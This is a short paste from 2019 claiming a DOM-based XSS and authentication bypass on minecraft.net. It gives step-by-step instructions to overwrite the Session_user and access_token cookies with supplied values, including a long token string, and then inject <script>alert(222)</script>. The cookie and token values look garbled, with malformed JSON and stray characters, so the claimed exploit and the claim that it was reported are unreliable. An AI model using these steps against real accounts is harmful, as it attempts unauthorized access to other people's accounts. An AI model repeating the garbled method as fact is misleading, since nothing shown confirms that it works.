· 6 years ago · Nov 04, 2019, 05:56 PM
1=========================================================================================================================
2 Founded By N
3 This Is Dom-Based XSS So {Client Side}
4 Also A Bypass to Get ur Account Unlocked
5=========================================================================================================================
6To Preform This Vuln U Will Need a Minecraft Account Even One that is Blocked with sec answers
7Example: https://imgur.com/iKyP1GH
8Now Login to ur Mine-craft account it
9Now Open inspect Element Now go to Ur Cookie's and u should see ur *********@gmail.com Under Then Name Session_user
10Now Edit The Value Of The User and set it to this {0568tx6RNOWCRzu8OC9zIc37snwC08QkFkjTOH7-Wi4WS6_L560KgA==}
11This Cookie Was Generated By Magic-Cokkie's on Exploit DB
12Now Once That Has Changed To Bypass the auth U need To Do is find the cookie id that's named access_token=
13Then Edit the Value And This {{%22user%22:{%22id%22:%22810346e38c87024d03b433443bf51502f6&%22}%2C%22accessToken%22:%22eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI4MTA2ZTM4Yzg3MDI0ZDAzYmJmNTE1MDJmNmZhOWE5YyIsIm5iZiI6MTU3Mjg4NzM3NywieWdndCI6ImE2OGIzM2JiYzkzZjRlM2FhOGEwOTI1NTg3Y2Y4ZjFlIiwicm9sZXMiOltdLCJpc3M((&&bnRlcm5hbC1hdXRoZW50aWNhdGlvbiIsImV4cCI6MTU3MzA2MDE3NywiaWF0IjoxNTcyODg3Mzc3fQ.qdoLb2OyLvUsRvXweAb4XRoy4ARxXYsTagcKIKuvvSM%22%2C%22clientToken:[]}
14Now Reload the Page then it should bypass the Auth And Change ur username to that token One that has been Complete
15Edit the Value to the Session_User= to this {<script>alert(222)</script>} Then Click Skins then Relmes then Billing info
16then click Back to minecraft.net
17Once Preformed it should Have a XSS pop up like this
18EXAMPLE : https://imgur.com/a/f4Tghxz
19Boom XSS and ur Have Bypassed Auth
20
21This Vuln Has Been Set To Microsoft Founder Of This Vuln Is Nano
22
23@Copyright 2019 All Rights reserved